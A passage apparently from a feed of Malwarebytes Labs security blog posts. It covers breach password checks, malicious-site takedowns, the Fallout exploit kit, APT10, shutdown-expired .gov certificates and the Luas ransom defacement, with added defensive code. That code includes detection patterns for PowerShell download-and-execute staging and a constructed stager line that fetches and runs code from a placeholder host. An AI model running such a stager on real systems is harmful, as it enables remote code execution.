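    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def fetch_range(prefix: str, timeout: float = 10.0) -> str:
    """Fetch every suffix sharing this prefix (the only network call in the module)."""
    req = urllib.request.Request(RANGE_URL + prefix,
                                 headers={"User-Agent": "pwned-range-check-example"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


def count_in_range(suffix: str, range_body: str) -> int:
    """Parse 'SUFFIX:COUNT' lines; return the breach count for our suffix, 0 if absent."""
    for line in range_body.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        candidate, count = line.split(":", 1)
        if candidate.upper() == suffix:
            return int(count)
    return 0


def pwned_count(password: str, fetch=fetch_range) -> int:
    """Number of times the password appears in known breaches (0 = not found)."""
    prefix, suffix = sha1_prefix_suffix(password)
    return count_in_range(suffix, fetch(prefix))


# Constructed stand-in for the API response to prefix 5BAA6 (the prefix of "password").
# The second suffix is the real one for "password"; counts and other suffixes are made up.
SAMPLE_RANGE_5BAA6 = """\
003D68EB55068C33ACE09247EE4C639306B:3
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493
8BC1F3B8BAFA0C1A0E2B24AD94C9F2D71A8:1
"""

if __name__ == "__main__":
    import getpass
    pw = getpass.getpass("password to check: ")
    n = pwned_count(pw)          # live lookup; swap fetch=lambda p: SAMPLE_RANGE_5BAA6 to run offline
    print(f"seen {n} times in known breaches" if n else "not found in Pwned Passwords")
```

The prompt uses getpass so the password never lands in shell history; the same pwned_count() function can be wired into a sign-up or password-change handler to reject credentials that already appear in breach corpora, which is the NIST SP 800-63B recommendation.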

No, this may not have been the breach to end all breaches. But that doesn’t mean it should be taken lightly. In fact, this is an opportunity for 770 million people to shore up their defenses by making a simple, yet effective, change.

As always: Stay safe, everyone!

The post Collection 1 data breach: what you need to know appeared first on Malwarebytes Labs.


Hosting malicious sites on legitimate servers: How do threat actors get away with it?

Malwarebytes - Fri, 01/18/2019 - 16:00

How do threat actors manage to get their sites and files hosted on legitimate providers’ servers? I have asked myself this question many times, and many times thought, “The threat actors pay for it, and for some companies, money is all that matters.”

But is it really that simple? I decided to find out.

I asked some companies, as well as some of my co-workers who are involved with site takedowns on a regular basis, about their experiences.

I conversed with William Tsing, who is, among other things, responsible for infringements on the Malwarebytes brand; Steven Burn, our Website Protection Team Lead; and a spokesperson for International Card Services B.V. (ICS), the company behind the well-known Visa and Mastercard credit cards. I also sent inquiries to some international banks, but as of press time, they have not replied. On the receiving end of takedown requests, I queried providers about their methods and motives.

Background for the investigation

To give you some background on why we are involved in takedowns: Even though we protect our customers by adding malicious domains and IPs to our block lists, we also report those sites and try to get them taken offline. This does not always result in a successful takedown, but if there is a chance to protect everyone against malicious sites (and not just our clients), we will always grab the opportunity.

Let’s look at this problem from a few angles, starting with the initiators of takedowns.

Protecting your brand and your customers

Imposters can give your company an undeserved bad reputation and cause financial damages. Many financial companies are held responsible for losses due to phishing mails and fake copies of their websites. So they are generally well organized when it comes to dealing with abuse complaints. In the financial sector, one of the biggest problems is phishing mails linking to imitation sites. These imitations can be convincing, complete with green padlocks and ironic warnings about phishing.

Financial corporations in general and banks in particular are well prepared for abuse cases. Most of them have the following in place:

  • Educational pages on their site about how to recognize and deal with phishing attempts.
  • Self-help instructions about what to do if you clicked on a link or entered your credentials on a fake site.
  • An abuse email address where customers and researchers can forward phishing mails and where you can report fake sites.
  • An abuse department that is constantly fighting to get sites taken offline that are targeting their brand(s).

The spokesperson for ICS let us know that they always attempt to take down malicious sites and are successful in about 300 cases per month, globally. In their experience, most providers are quick to take action, but sometimes differing time zones and office hours drag on the process longer than necessary.

At Malwarebytes, we also have to deal with imposters, some of which are selling our free product and others who are tech support scammers pretending to be our support department. William Tsing has had a few of these guys for breakfast, but there are some cases where it is frustrating to have fraudulent content removed. Some of our grievances are:

  • Dealing with automated bots that are impossible to convince there is something fraudulent going on.
  • No response from the provider at all.
  • A culture that would rather receive complaints about the content than from disgruntled customers who had their content removed—no matter what that content is.

This provider apparently knows what should be removed.

Hosting and other providers

As mentioned earlier, we also sent some inquiries to hosting companies and, this may not come as a surprise: the companies that actually do act upon takedown requests were the only ones that responded. The rest decided to deal with my request for information in the same way they would with a takedown request—they ignored it.

According to Steven Burn, who is responsible for the Malwarebytes block lists, this is typical behavior. In his experience, however, Western European and North American hosting companies are usually a lot more cooperative than Russian and Chinese providers.

We have asked these hosting companies what they consider malicious content, and the ones that responded agreed on the following reasons for taking sites offline:

  • Phishing content
  • Hacking content
  • Malware (as downloads)
  • Spamming

Some others also specified:

  • Illegal software and cracks
  • Inappropriate content

These providers all estimated the time between receiving a complaint and fixing the problem to be well under eight working hours. I know from experience that most are even faster. We also know that the ones that didn’t respond are more likely to deal with requests from big companies faster than those of researchers, or as they put it, “unrelated third parties.” And some may not respond at all, or worse, have an automated bot send you responses that drive you up the wall or into despair.


There are other providers at play when it comes to malicious sites. Take, for example, URL-shorteners. URL shortening services are often used by cybercriminals to obfuscate redirects to malicious destinations. So, if you’re unable to get the website itself removed because the hosting provider is unresponsive, you can try to get the URL-shortener to remove the shortened link from their redirections list. In some cases where the threat actor spread the link only in the shortened form, this could be just as effective. Most of these URL-shortening services provide excellent support, as well as detailed instructions on their site on how to proceed.


A domain name registrar is a company that manages the reservation of Internet domain names. In the chain of hosting malicious websites, they are at least as important as the company providing the physical server. A registrar can stop DNS requests for a domain from ever reaching the server it points to. A registrar is also the party that necessarily enables threat actors when they use techniques like Domain Generation Algorithms (DGAs): if the threat actor is unable to automatically register the domains the algorithm generates, the entire DGA setup fails. Sometimes the registrar and the hosting company are the same, but this is not always the case.

Server scans

Another question I asked the providers is whether they perform scans of their servers for inactive malware or for malicious sites. Inactive malware on a server could indicate that a website is hosting malware for download. Hosted malware can be used as a payload for downloader Trojans, or it could be offered for download under the smokescreen of pretending to be a legitimate file. The providers responded that their servers are protected, but not by security software that scans for inactive malware. One provider, however, indicated that they scan newly-created sites for signs that the site could be used for malicious purposes in order to proactively set them offline.

Security researchers

Many security researchers will report their findings to interested parties. How effective they are seems to depend on how well they are connected. This is unfortunate, as requests from relatively unknown researchers can be just as legitimate as those from longtime players. Our belief is that every complaint should be taken seriously, whether it was sent to the general abuse email address or to the head of the department; whether it comes from a finance company, an antivirus vendor, or an independent botnet researcher.

Our experience with providers varies so widely that it’s hard to give general guidance. There is a provider that lets Steven Burn take sites offline himself and asks questions later. There was a provider that kept getting abused by tech support scammers, but when I pointed it out to them, they sought and found a common property in all the accounts that the threat actors registered with them. By doing so, they were able to root out all the scammers’ sites, even the ones that hadn’t been published yet. These are some examples of the ways in which we could work together to make the Internet a safer place.

But if you are a researcher or work in an abuse department, you also know the other end of the spectrum. I’m talking about the providers that would sell their grandfather for a buck or the social media giants that get so many complaints, it takes months just to get past the automated responses.

The answer to my question

In an ideal world, threat actors would have to use their own servers to host malicious sites. This would make it a lot easier for law enforcement to find out who they are and put them where they belong. Talking to some of the people that have to deal with this problem on a daily basis has more or less confirmed what I already suspected: the underlying problem for the hosting of malicious sites is about money. However, it’s perhaps a bit more nuanced than I originally believed. My revision to my original answer, then, would be that two issues are at play:

  • The provider does not care where the money comes from, or how the site will be used to make more money.
  • The provider has not prioritized spending money on a functioning abuse department.

Is there anything we can do to change these attitudes? There is one way to get providers to sit up and listen. When we host our own sites, we can ask ourselves which type of provider we would rather do business with: one that takes abuse seriously, or one that turns a blind eye to cybercrime? If negligent practices turn into profit losses, it’s likely these hosting companies will take takedown requests more seriously.

Waiting for legislation that holds providers partly responsible for the content they are hosting could take a long time—or it may not even happen in some countries. It’s best, then, to take matters into your own hands. If you see something, say something. And if you own your own website now or plan to launch one in the future, look into the business practices of those hosting companies and invest in those that are taking Internet safety seriously.

Do you have takedown experiences of your own to share? Have you ever reported a malicious site to a provider? Sound off in the comments section.

The post Hosting malicious sites on legitimate servers: How do threat actors get away with it? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Improved Fallout EK comes back after short hiatus

Malwarebytes - Thu, 01/17/2019 - 19:51

After a short hiatus in early January, the Fallout exploit kit is back in business again with some new features for the new year. During its absence, we noticed an increase in RIG EK campaigns, perhaps to fill that temporary void.

Fallout EK is distributed via malvertising chains (one of them we track under the name HookAds), especially through adult traffic. Since January 15, Fallout EK activity has been picking up pace again to deliver the GandCrab ransomware.

The revised Fallout EK boasts several new features, including integration of the most recent Flash Player exploit. Security researcher Kafeine identified that Fallout is now the second exploit kit to add CVE-2018-15982.

Fallout EK 2019 highlights:
  • HTTPS support
  • New landing page format
  • New Flash exploit (CVE-2018-15982)
  • PowerShell to run payload

One aspect that caught our attention was how Fallout was delivering its payload via PowerShell rather than using iexplore.exe. This was also mentioned in the EK developer’s advert reposted by Kafeine on his site.

The Base64-encoded PowerShell command calls out to the payload URL and loads it in its own way:

This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload.
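Because the payload stage is a Base64-encoded PowerShell command rather than a file dropped by Internet Explorer, the place to catch it is process-creation telemetry. PowerShell's `-EncodedCommand` switch takes Base64 of UTF-16LE text, so a decoder is short. The following is an added example (not code from the Malwarebytes post or from any Fallout analysis) that decodes such command lines and flags download-and-execute staging; the sample records are constructed, the payload URL is a placeholder, and treating a browser parent of powershell.exe as noteworthy is an assumption drawn from the iexplore.exe point above.

```python
"""Decode PowerShell -EncodedCommand launches from process-creation telemetry and
flag download-and-execute staging. Added example, not code from the post or from
any exploit-kit analysis; records below are constructed, URL is a placeholder."""
import base64
import binascii
import re

# PowerShell accepts -e, -ec, -enc, -encoded, -encodedcommand ... for the same switch.
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")

# Strings a defender commonly associates with in-memory download-and-run staging.
INDICATORS = {
    "invoke-expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "web-download": re.compile(r"(?i)downloadstring|downloadfile|downloaddata|"
                               r"invoke-webrequest|net\.webclient"),
    "url": re.compile(r"(?i)https?://[^\s'\"]+"),
    "nested-base64": re.compile(r"(?i)frombase64string"),
}
# Assumption: a browser spawning PowerShell is worth a look in an exploit-kit context.
BROWSER_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}


def encode_powershell(script: str) -> str:
    """The form PowerShell expects after -EncodedCommand: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded-command switch with
    valid base64/UTF-16LE content, otherwise None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(record: dict) -> dict:
    """record = {"parent": parent image name, "cmdline": full command line}."""
    decoded = decode_encoded_command(record["cmdline"])
    text = decoded if decoded is not None else record["cmdline"]
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    if record.get("parent", "").lower() in BROWSER_PARENTS:
        hits.append("browser-parent")
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": hits,
        "suspicious": "browser-parent" in hits or "web-download" in hits,
    }


# Constructed records: a routine admin command, a browser-spawned encoded stager
# (placeholder URL), and a script run with an -E... switch that is NOT -EncodedCommand.
CONSTRUCTED_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
CONSTRUCTED_RECORDS = [
    {"parent": "explorer.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'},
    {"parent": "iexplore.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_powershell(CONSTRUCTED_STAGER)},
    {"parent": "services.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for rec in CONSTRUCTED_RECORDS:
        result = analyze(rec)
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"[{flag}] parent={rec['parent']} indicators={result['indicators']}")
        if result["decoded"]:
            print("    decoded:", result["decoded"])
```

The third record shows why the switch regex insists on whitespace right after the abbreviation: `-ExecutionPolicy` and `-eq` also start with `-e` and must not be mistaken for `-EncodedCommand`.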

What this new development tells us is that exploit kit developers are still monitoring the scene for new exploits and techniques. In 2018, several zero-days for Internet Explorer and Flash Player were found and turned into easily adaptable proof of concepts. Even though the market share for IE and Flash continues to drop, there are many countries still running older systems where the default browser is Internet Explorer. Therefore, threat actors will take advantage.

Malwarebytes users are already protected against this updated Fallout EK.

Indicators of Compromise

  IP address        Domain                    Campaign
  185.56.233[.]186  advancedfeed[.]pro        HookAds Campaign
  51.15.35[.]154    payformyattention[.]site  Fallout EK

The post Improved Fallout EK comes back after short hiatus appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The Advanced Persistent Threat files: APT10

Malwarebytes - Wed, 01/16/2019 - 17:00

We’ve heard a lot about Advanced Persistent Threats (APTs) over the past few years. As a refresher, APTs are prolonged, targeted attacks on specific victims with the intention to compromise their systems and gain information from or about that target. While the targets may be anyone or anything—a person, business, or other organization—APTs are often associated with government or military operations, as they tend to be the organizations with the resources necessary to conduct such an attack. Starting with Mandiant’s APT1 report in 2013, there’s been a continuous stream of exposure of nation-state hacking at scale.

Cybersecurity companies have gotten relatively good at observing and analyzing the tools and tactics of nation-state threat actors; they’re less good at placing these actions in context sufficient enough for defenders to make solid risk assessments. So we’re going to take a look at a few APT groups from a broader perspective and see how they fit into the larger threat landscape.

Today, we’re beginning with APT10. (Note: These groups have a panoply of different names, but for simplicity’s sake, we’re going to borrow Mandiant’s naming conventions for Chinese groups.)

Who is APT10?

First observed in 2009, APT10 is most commonly attributed via open source research to the Chinese Ministry of State Security (MSS). MSS attacks typically, though not exclusively, involve intelligence targets surrounding trade negotiations, research and development in competition with Chinese commercial entities, and high-value counterintelligence targets overseas. As an example of a trade negotiation op, Fidelis Security observed a watering hole attack in February 2017 targeting members of the National Foreign Trade Council, a US trade lobby group.

A commonly-used tool of APT10 is Scanbox, which is a form of malware that can offer insights into their targeting priorities. Scanbox has been observed on assorted industrial sector targets in the US and Japan, but also on Uighur dissidents overseas. While this supports the thesis of APT10 being a government threat group, we caution defenders against associating any one piece of malware exclusively with one group. Countries maintain multiple threat groups, all of whom are fully capable of collaborating and sharing TTPs.

Malware commonly deployed

APT10 is known for deploying the following malware:

Note: PlugX and Poison Ivy were originally developed and deployed by Chinese state-sponsored actors. They have since been sold and resold to individual threat actors across multiple nations. At time of writing, it is inappropriate to attribute an attack to Chinese threat actors based on PlugX or Poison Ivy deployment alone.

Should you be worried?

That depends on the type of organization you run. APT10 has been observed to most commonly target construction, engineering, aerospace, and regional telecoms, as well as traditional government targets. If your company exists outside these verticals, it’s unlikely that APT10 would expend the time and resources to target you. For companies outside the targeting profile, it’s much more cost effective to spend defense budgets on common vulnerabilities that are most leveraged by common attackers.

What might they do next?

Like most APTs, APT10 has traditionally targeted at scale when attacking commercial enterprise. However, a more recent report by PricewaterhouseCoopers and BAE Systems suggests that they’ve begun devoting a portion of their operations to targeting Managed Service Providers (MSPs), most likely in an attempt to exfiltrate sensitive client data. Given that there’s been increasing awareness of advanced threats by high-value targets, continuing to target MSPs in this way is a plausible means of obtaining the same desired data at a lesser cost.

Further resources

If you’d like to do some additional reading on APTs, and specifically APT10, take a look at the following resources:

FireEye’s APT10 profile

Dark Reading article: China-based threat actor APT10 ramps up cyber espionage activity

PwC’s brief on Operation Cloud Hopper (APT10 campaign)

The post The Advanced Persistent Threat files: APT10 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How the government shutdown is influencing cybersecurity jobs

Malwarebytes - Tue, 01/15/2019 - 17:16

As of this writing, the government shutdown of 2019 is the longest ever in America. The only good news about this situation is that, with each passing day, a new group of people in the country seems to rediscover just how essential government services are, now that they’re unavailable.

The next likely casualty is the government’s stable of cybersecurity talent. Here’s why—and what it might mean for us in the long run.

How much government talent is furloughed?

Some of us might be surprised to learn the federal government has a workforce dedicated solely to cybersecurity. Many of these completely essential institutions and teams are now reduced to skeleton crews. This has the potential for long-lasting harm when it comes to the government’s ability to retain these specialists.

At time of writing, the Department of Homeland Security has furloughed 20 percent of its staff dedicated to “main cyber operations,” as well as administrative and supporting roles. But when you look at the entire cybersecurity apparatus of the federal government, the total potential loss of talent is far greater than the DHS alone. According to a planning document, 43 percent of the entire US cybersecurity workforce is currently furloughed.

Taking the top spot, however, is the National Institute of Standards and Technology, or NIST, with 85 percent of its staff furloughed.

This represents a danger today on a number of levels. But there’s a longer-lasting kind of harm, too, that few are talking about right now.

Will federal employees flock to the private sector?

Some of the more important staff and talent initiatives taken on during the Obama administration concerned the treatment, compensation, and benefits of federal employees and contractors. The goal was to make the public sector (the government) more competitive with the private sector. That’s how corporations retain talent, and it’s how the government can do so as well.

It’s no secret that job prospects for computer scientists, and cybersecurity specialists in particular, are rather cushy right now. Software developers enjoy a median income of more than $100,000 per year.

But now that the government is shut down, Washington, D.C. (and all of our state governments) will struggle even more not only to win talent over from the private sector, but keep it. With paychecks potentially off the table for a while, it’s becoming more likely that this already fragile situation will be pushed to the breaking point.

In an interview with the Washington Post, a former DHS cyber official named Greg Garcia explained the situation: “There’s unpredictability and uncertainty and instability [for DHS cyber employees],” he said. “Add on top of all that not getting paid, and I do not envy them.”

The problem here is one of morale. We have not been trying hard enough in recent years to maintain the government’s competitiveness with industry, and now we’re paying the price.

What does the future hold for cybersecurity talent at the federal level?

The bottom line with this government shutdown, just like with any other, is that sending your employees home without pay, and without a timetable for when their jobs and offices will be back up and running, is a bad way to do business.

What we’re likely to see is a “chilling effect” on the next generation or two of potential government employees. Holding these positions hostage in budget negotiations, positions for which applicants earned degrees and accreditation, is the equivalent of telling them the government isn’t an honorable employer and their talent isn’t valued—and that we don’t care if they take it elsewhere.

And there’s plenty of “elsewhere” for them out there, it turns out. In 2017, there were nearly 300,000 jobs available in the “cyber sciences.” That sounds like a lot of opportunities—but it will actually blossom into a full-blown talent shortage of 1.8 million jobs by 2022.

We don’t really want to be turning people off from this line of work—especially not when the stakes are so high. Moreover, it’s clear the government can’t afford to lose the talent it’s already brought together. There’s not going to be enough of it to go around before too long—and the priorities, arguably, should rest with national security.

Remembering the stakes

Barely a day goes by where we’re not reminded that, just as it has brought us closer together, Internet connectivity has also provided new tools for potential disruptive influences.

Reports are available now detailing the degree to which critical national infrastructure—such as our nuclear and other power plants, water treatment facilities, and electrical grids—are surprisingly vulnerable to domestic as well as foreign hacking attempts. This is a bright and wonderful age, but it’s clear that many of the systems we rely on for civilized living aren’t as safe as they’re supposed to be.

We should remember that even our voting machines are outdated and stand a good chance of being hacked or otherwise tampered with. But while public awareness of these issues has increased, furloughing and devaluing cyber talent at the federal and state levels is not a good way to drum up attention and support for such important issues.

Are there any foreseeable solutions to this problem?

The first solution involves remembering that the US Defense Department, even before the government was shut down, was already losing some 4,000 employees to the private sector every year, a sign that our government was already a dissatisfactory place to work. In point of fact, “dissatisfied” or “very dissatisfied” was how 20 percent of DHS employees described their jobs in a survey that made the rounds in 2018.

Even some of the most critical resources on the Internet have been taken offline by this shutdown. NIST maintains catalogs of government cybersecurity standards that are essential for maintaining webpage uptime and HTTPS certificates. With 85 percent of their staff sitting at home, security certificates will expire and websites will be taken down.

When resources like these are unavailable, the Internet becomes a manifestly less safe place to spend time. And that’s the last thing we want.

The post How the government shutdown is influencing cybersecurity jobs appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (January 7 – 13)

Malwarebytes - Mon, 01/14/2019 - 16:45

Last week on the Malwarebytes Labs blog, we took a look at the Ryuk ransomware attack causing trouble over the holidays, as well as a ransom threat for an Irish transportation company. We explored the realm of SSN scams, and looked at what happens when an early warning system is attacked.

Other cybersecurity news
  • Password reuse problems. Multiple Reddit accounts reported being locked out after site admins blamed “password reuse” for the issue. (Source: The Register)
  • 85 rogue apps pulled from Play Store. Sadly, not before some 9 million downloads had already taken place. (Source: Trend Micro)
  • Home router risk. It seems many home routers aren’t doing enough in the fight against hackers. (Source: Help Net Security)
  • Deletion not allowed. Some people aren’t happy they can’t remove Facebook from their Samsung phones. (Source: Bloomberg)
  • Takedown: How a system admin brought down the notorious “El Chapo.” (Source: USA Today)
  • 2FA under fire. A new pentest tool called Mantis can be used to assist in the phishing of OTP (one time password) codes. (Source: Naked Security)
  • Facebook falls foul of new security laws in Vietnam. New rules have brought a spot of bother for Facebook, accused of not removing certain types of content and handing over data related to “fraudulent accounts.” (Source: Vietnam News)
  • Trading site has leak issue. A user on the newly set up trading platform was able to grab a lot of potentially problematic snippets, including authentication tokens and password reset links. (Source: Ars Technica)
  • Local risk to card details. A researcher discovered payment info was being stored locally on machines, potentially exposing them to anyone with physical access. (Source: Hacker One)
  • Facebook exec swatted. The dangerous “gag” of sending armed law enforcement to an address ends up causing problems for a “cybersecurity executive,” after bogus calls claimed they had “pipe bombs all over the place.” (Source: PA Daily Post)

Stay safe, everyone!

The post A week in security (January 7 – 13) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Government shutdown impacts .gov websites, puts Americans in danger

Malwarebytes - Mon, 01/14/2019 - 16:00

If you are in the United States, then you likely already know that we are on our 24th day of a government shutdown. While it is considered a “partial” shutdown, there are still plenty of government workers who are furloughed, which impacts the services they run—both online and off.

Last week, TechCrunch posted a concerning story about the shutdown, which covered the findings of NetCraft, a UK Internet service company, who discovered that numerous US government websites are now inaccessible due to expired security certificates.

This is a quick post to explain what happened, and more importantly, how cybercriminals will use this situation to their advantage.

Security certificates

We aren’t going to dig deep into how security certificates work for websites, but the gist is that every vendor or organization that uses a website requires a security certificate for users to access their site with trust. Today, a few browsers, like Chrome, require these certificates before they even let users access the websites. You can recognize when a website uses a valid security certificate, usually indicated by a green lock on the URL bar.

The certificate confirms that the identity of the website that you are communicating with is legitimate. In addition, these certificates make it possible for users to establish a secure connection with the web server hosting the site, which is incredibly important when sending financial or personal information over the Internet.

Since some of the most popular browsers won’t even let users visit a website if it doesn’t have a valid certificate, we now have a lot of users who can’t access government websites because the certificates have expired.

Why did they expire?

If a security certificate lasted forever, what would be the assurance that it hasn’t been stolen by criminals who could then use it on their own malicious websites? Because of this, the organization that owns the website must purchase and deploy a new certificate each year. Think of it as a yearly registration fee, not unlike renewing your car tags.

The reason these certificates were allowed to lapse is because no one’s at work renewing them. Apparently, most US government websites maintain their own certificates. This is why not all US .gov websites are down—just a few of them (at least for now). With the partial shutdown, the people in charge of making sure citizens can access their websites by keeping these certificates up-to-date are unable to do their jobs, which eventually leads to users being unable to access these sites at all.
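A certificate that lapses because nobody is watching the renewal date is a monitoring gap as much as a staffing one, and the check is cheap to automate. The following is an added example (not code from the Malwarebytes post or from any government site) that audits an inventory of sites by their `notAfter` dates and classifies each as expired, expiring within a warning window, or fine. The inventory is constructed with placeholder hostnames, and "now" is pinned to the post's date so the result is reproducible; `fetch_not_after` is the live variant and is not used by the offline run.

```python
"""Flag TLS certificates that have lapsed or are about to. Added example, not code
from the post; the inventory below is constructed and the hostnames are placeholders."""
import socket
import ssl


def days_until_expiry(not_after: str, now: float) -> float:
    """not_after is the notAfter string ssl.getpeercert() returns, e.g.
    'Jan 14 16:00:00 2019 GMT'; now is a POSIX timestamp (UTC)."""
    return (ssl.cert_time_to_seconds(not_after) - now) / 86400.0


def classify(not_after: str, now: float, warn_days: int = 30) -> str:
    """'expired' once notAfter has passed, 'expiring' inside the warning window, else 'ok'."""
    d = days_until_expiry(not_after, now)
    if d < 0:
        return "expired"
    if d <= warn_days:
        return "expiring"
    return "ok"


def fetch_not_after(host: str, port: int = 443, timeout: float = 5.0) -> str:
    """Retrieve notAfter from a live server with full verification. A certificate that
    has already expired fails verification here, which is exactly what the visitor's
    browser sees, so that case is surfaced instead of silently skipped."""
    ctx = ssl.create_default_context()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return tls.getpeercert()["notAfter"]
    except ssl.SSLCertVerificationError as exc:
        raise RuntimeError(f"{host}: certificate rejected ({exc.verify_message})") from exc


def audit(inventory: dict, now: float, warn_days: int = 30) -> dict:
    """inventory: {site: notAfter string}. Returns {site: status}."""
    return {site: classify(not_after, now, warn_days) for site, not_after in inventory.items()}


# Constructed inventory; 'now' pinned to the post's date so the output is reproducible.
FIXED_NOW = ssl.cert_time_to_seconds("Jan 14 16:00:00 2019 GMT")
CONSTRUCTED_INVENTORY = {
    "portal-a.example": "Jan 02 00:00:00 2019 GMT",   # already lapsed
    "portal-b.example": "Jan 30 00:00:00 2019 GMT",   # renewal due inside the warning window
    "portal-c.example": "Dec 31 23:59:59 2019 GMT",   # fine for now
}

if __name__ == "__main__":
    for site, status in audit(CONSTRUCTED_INVENTORY, FIXED_NOW).items():
        remaining = days_until_expiry(CONSTRUCTED_INVENTORY[site], FIXED_NOW)
        print(f"{site}: {status} ({remaining:.1f} days)")
```

For a live sweep, replace the constructed `notAfter` strings with `fetch_not_after(host)` and `FIXED_NOW` with `time.time()`; a 30-day warning window leaves room for a renewal to be approved and deployed even when the people who normally do it are not at their desks.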

What’s the problem?

Obviously, not being able to access some government websites is a pain, but is it dangerous? The answer is: yes, because you can bet that cybercriminals are going to take advantage of the situation.

That is why we want to share some vital warnings about how this shutdown may help cybercriminals. Please, share this with everyone you know, at least until the shutdown is over.

Cybercriminals frequently use real-world events to trick users into clicking on a link or opening an attachment. You can look back at a couple of instances where events in Syria directly influenced the actions of cybercriminals, be it state sponsored or otherwise. In another case, the Boston bombing was used to try and scam people. From terrorist attacks to natural disasters, threat actors jump on the chance to exploit episodes of fear and uncertainty.

Fake YouTube page set up to infect Syrian rebels

You can expect that users who are looking for government websites, especially if they offer a service or require personal information or a login to access, are going to find copies of these sites presented as an alternative to access the same website.

Fake Singapore government website. Photo credit: Gov.SG

Users who rely on social services—typically older folks, veterans, or the disabled—will be looking for a way to access the government sites they frequent. When they search for the site, their first link might take them to a dead end, since the security certificate has expired. However, the second or third link might work and take the user to a page that looks exactly like where they want to go.

Classic phishing attack.

What to do about it

The best thing to do right now is share this information with those closest to you so they don’t make a mistake and give away valuable personal info just because the government has issues keeping itself open. Also, be vigilant moving forward, not just in this case but anytime there is sensational news. Don’t just accept what the Internet tells you. Investigate. Think twice. And please, please, when in doubt, do not submit your personal information online.

The bad guys know human behavior, and they know that people can’t help clicking on links that are either convenient or scandalous and sensational. Prove them wrong.

Stay safe out there!

The post Government shutdown impacts .gov websites, puts Americans in danger appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Luas data ransom: the hacker who cried wolf?

Malwarebytes - Fri, 01/11/2019 - 18:00

In a terrible start to the year for Irish tram firm Luas, their site was compromised a week ago and adorned with a stark ransom warning:


You are hacked. Some time ago I wrote that you have serious security holes.

You didn’t reply.

The next time someone talks to you, press the reply button.

You must pay one bitcoin in five days. Otherwise I will publish all data and send emails to your users.

The message came with a Bitcoin address, and the defacement was quickly taken down.

Real threat or a blast of bluster?

Many observers questioned the legitimacy of this ransom threat. One Bitcoin is currently around 3,100 Euros. Luas aren’t exactly short of cash, so it wouldn’t be an issue for them to pay (not that we’d advise it). The general feeling was that either 3,100 Euros was a large sum of money to the attacker, or they just wanted the company to address the problem facing them without fuss.

As soon as the hack was announced, nervous customers wondered exactly what might be dumped into the ether should the ransom go unpaid. Names and addresses? Emails? Perhaps even payment data? However, this is where the hacker’s version of events starts to unravel. I’m not personally familiar with the website in question, and it’s currently still down, so I looked on Internet Archive.

A trip down memory lane

The site doesn’t appear to have any form of registration or login; it seems to be more of an information portal. Additionally, the one section that references payment—“Pay your standard fare notice”—leads to the payments site, which Luas pointed out hadn’t been compromised. The site read as follows:

The Luas website is undergoing restoration following a cyber-attack.

We wish to advise customers that the Tax Saver and Standard Fare Notice sites have NOT been compromised.

It’s worth noting the payments section hasn’t been taken offline, either.

The hacker who cried wolf?

We waited with bated breath as the ransom timer ticked down. Would we see a large blast of customer data popping up online? Or would the whole thing fall flat? If essential information such as logins and payment data hadn’t been grabbed, what exactly were we talking about here? Basic website metrics such as visitor stats or website referrers? What could this attacker possibly have grabbed while achieving what appears to have been a perfectly standard webpage defacement in all other respects?

The answer is, of course, “Nobody knows.”

The deadline has come, gone, and is now on vacation somewhere. Occasionally, it lets you know the weather is lovely and reminds you to put the bins out.

Absolutely none of which helps anybody who suspects they may have been caught up in this. Slightly more surreal is the fact that Luas said they’d contact anyone they thought may be affected, yet I can’t find a single example of that contact on social media.

Customers: An update on the Luas cyberattack.

Luas technicians are still investigating it and are working to restore the site.

Luas has contacted the Commissioner for Data Protection and we have in accordance with best practice contacted everyone whose information may have been compromised.

This is absolutely not what normally happens, and at this point I’d usually be linking to a deluge of “you got me” posts. That’s the theory. The reality, currently, is nothing but a wave of silence.

This number is no longer available

Our suspicion here is that nothing customer related was taken and it was all a ransom-themed bluff to either grab some Bitcoin cash or attention, or perhaps both. If you’ve used any Luas site for any type of registration or payment, you’re probably fine.

The attacker said they would dump the data publicly rather than on some hidden underground forum, so unless they had a sudden change of heart, that should have happened by now. It hasn’t. People may call those forums “underground,” but the reality is that data dumps don’t remain private for long either way.

No further updates are forthcoming from Luas, so it doesn’t appear they’ve been told their number is up either. All in all, we’d say cross some fingers and hope everything is coming up Milhouse.

While I try to remember if things coming up Milhouse is good or bad, here’s what you can do if you’re still worried you may be affected.

Data dump fallout tips

This isn’t just good advice for the Luas attack, but for any potential breach situation.

